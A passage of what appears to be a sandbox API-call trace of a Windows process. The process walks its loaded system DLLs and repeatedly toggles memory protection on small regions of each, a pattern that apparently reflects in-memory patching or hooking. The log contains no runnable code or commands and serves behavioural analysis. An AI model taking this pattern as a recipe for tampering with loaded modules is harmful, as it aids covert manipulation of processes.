BaseAddress=0x13ffb98*=0x756c10a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756c1000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.845] GetCurrentProcess () returned 0xffffffff [0052.845] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756c10a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756c1000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.845] GetCurrentProcess () returned 0xffffffff [0052.845] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756c10b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756c1000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.845] GetCurrentProcess () returned 0xffffffff [0052.845] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x756c10b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x756c1000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.846] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.846] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.847] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.847] GetModuleFileNameA (in: hModule=0x777e0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")) returned 0x20 [0052.847] GetCurrentProcess () returned 0xffffffff [0052.847] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x778ea1ec, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x778ea000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.847] GetCurrentProcess () returned 0xffffffff [0052.847] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x778ea1ec, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x778ea000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.847] GetCurrentProcess () returned 0xffffffff [0052.847] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x778ea1f0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x778ea000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.848] GetCurrentProcess () returned 0xffffffff [0052.848] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x778ea1f0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x778ea000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.848] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.849] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.849] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.849] GetModuleFileNameA (in: hModule=0x756e0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0052.849] GetCurrentProcess () returned 0xffffffff [0052.849] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b298, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.850] GetCurrentProcess () returned 0xffffffff [0052.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b298, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.850] GetCurrentProcess () returned 0xffffffff [0052.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b2a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.850] GetCurrentProcess () returned 0xffffffff [0052.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b2a0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.850] GetCurrentProcess () returned 0xffffffff [0052.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.851] GetCurrentProcess () returned 0xffffffff [0052.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.851] GetCurrentProcess () returned 0xffffffff [0052.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b01c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.851] GetCurrentProcess () returned 0xffffffff [0052.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b01c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.851] GetCurrentProcess () returned 0xffffffff [0052.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b020, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.851] GetCurrentProcess () returned 0xffffffff [0052.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b020, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.852] GetCurrentProcess () returned 0xffffffff [0052.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b02c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.852] GetCurrentProcess () returned 0xffffffff [0052.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b02c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.852] GetCurrentProcess () returned 0xffffffff [0052.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b040, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.852] GetCurrentProcess () returned 0xffffffff [0052.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b040, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.853] GetCurrentProcess () returned 0xffffffff [0052.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b048, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.853] GetCurrentProcess () returned 0xffffffff [0052.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b048, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.853] GetCurrentProcess () returned 0xffffffff [0052.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b058, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.853] GetCurrentProcess () returned 0xffffffff [0052.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b058, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.853] GetCurrentProcess () returned 0xffffffff [0052.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b05c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.854] GetCurrentProcess () returned 0xffffffff [0052.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b05c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.854] GetCurrentProcess () returned 0xffffffff [0052.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b074, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.854] GetCurrentProcess () returned 0xffffffff [0052.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b074, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.854] GetCurrentProcess () returned 0xffffffff [0052.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b07c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.855] GetCurrentProcess () returned 0xffffffff [0052.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b07c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.855] GetCurrentProcess () returned 0xffffffff [0052.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b088, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.855] GetCurrentProcess () returned 0xffffffff [0052.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b088, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.856] GetCurrentProcess () returned 0xffffffff [0052.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b08c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.856] GetCurrentProcess () returned 0xffffffff [0052.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b08c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.856] GetCurrentProcess () returned 0xffffffff [0052.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b0d4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.857] GetCurrentProcess () returned 0xffffffff [0052.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b0d4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.857] GetCurrentProcess () returned 0xffffffff [0052.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b0fc, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.857] GetCurrentProcess () returned 0xffffffff [0052.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b0fc, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.874] GetCurrentProcess () returned 0xffffffff [0052.874] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b124, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.875] GetCurrentProcess () returned 0xffffffff [0052.875] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b124, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.875] GetCurrentProcess () returned 0xffffffff [0052.875] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b178, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.875] GetCurrentProcess () returned 0xffffffff [0052.875] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7574b178, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7574b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.875] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.876] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.877] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.877] GetModuleFileNameA (in: hModule=0x77640000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0052.877] GetCurrentProcess () returned 0xffffffff [0052.877] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x776f61fc, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x776f6000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.877] GetCurrentProcess () returned 0xffffffff [0052.877] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x776f61fc, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x776f6000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.877] GetCurrentProcess () returned 0xffffffff [0052.877] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x776f6214, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x776f6000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.878] GetCurrentProcess () returned 0xffffffff [0052.878] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x776f6214, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x776f6000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.878] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.879] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.879] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.879] GetModuleFileNameA (in: hModule=0x77700000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0052.879] GetCurrentProcess () returned 0xffffffff [0052.879] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777391a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77739000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.879] GetCurrentProcess () returned 0xffffffff [0052.879] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777391a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77739000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.879] GetCurrentProcess () returned 0xffffffff [0052.879] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777391c4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77739000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.880] GetCurrentProcess () returned 0xffffffff [0052.880] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x777391c4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77739000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.880] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.881] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.881] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.881] GetModuleFileNameA (in: hModule=0x76bf0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0052.881] GetCurrentProcess () returned 0xffffffff [0052.881] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76ca0150, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76ca0000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.881] GetCurrentProcess () returned 0xffffffff [0052.881] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76ca0150, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76ca0000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.881] GetCurrentProcess () returned 0xffffffff [0052.881] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76ca0158, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76ca0000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.882] GetCurrentProcess () returned 0xffffffff [0052.882] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x76ca0158, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x76ca0000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.882] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.882] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.883] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.883] GetModuleFileNameA (in: hModule=0x74440000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0052.883] GetCurrentProcess () returned 0xffffffff [0052.883] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7445b0e4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7445b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.883] GetCurrentProcess () returned 0xffffffff [0052.883] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7445b0e4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7445b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.883] GetCurrentProcess () returned 0xffffffff [0052.883] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7445b0e8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7445b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.884] GetCurrentProcess () returned 0xffffffff [0052.884] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7445b0e8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7445b000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.884] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.885] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.885] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.885] GetModuleFileNameA (in: hModule=0x74430000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0052.885] GetCurrentProcess () returned 0xffffffff [0052.885] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7443601c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74436000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.885] GetCurrentProcess () returned 0xffffffff [0052.885] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7443601c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74436000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) 